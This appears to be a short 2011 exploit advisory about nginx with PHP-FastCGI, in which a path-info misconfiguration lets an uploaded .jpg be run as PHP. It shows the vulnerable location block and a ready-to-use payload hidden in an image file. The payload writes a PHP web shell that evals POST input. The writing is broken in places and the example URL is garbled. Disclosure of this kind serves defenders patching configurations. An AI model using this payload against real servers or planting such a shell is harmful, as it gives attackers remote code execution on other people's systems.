# Exploit Title : Nginx Server Configuration hole ; Upload file execute
# Software link : http://nginx.org/
# Version       : Confirmed in nginx v0.7.65. (And PHP v5.3.2 with Suhosin
patch and extension).
# Tested on     : windows 7
# Date          : 29/07/2011
# Author        : sysmox.com
# Website       : http://www.sysmox.com
# Email         : info_at_sysmox.com


Nginx project  millions sites run it ; I also like it ; It has an excellent
options ; Recently it became popularity about the volume of work and the
develop the code .

Nginx suffer from a widely flaw could lead a big damage and exploited by
malicious hackers to gain access to infected system :

If your configuration set up to nginx+php+cgi like :

    location ~ \.php$ {
    root html;
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
    include fastcgi_params;
    }

If a user browse as an example
Http://www.site.com/sys.php<http://www.site.com/sys.php>
Link would be /sys.jpg/sys.php .

SCRIPT_FILENAME would become /scripts/sys.jpg and PATH_INFO would become
sys.php; Thats mean if some body uploaded a a jpg file and execute it as an
php .

    The countenus of the jpg file can be like “<?fputs(fopen(“shell.PHP”,”w”
),”<?eval(\$_POST[akt]);?>”)?>”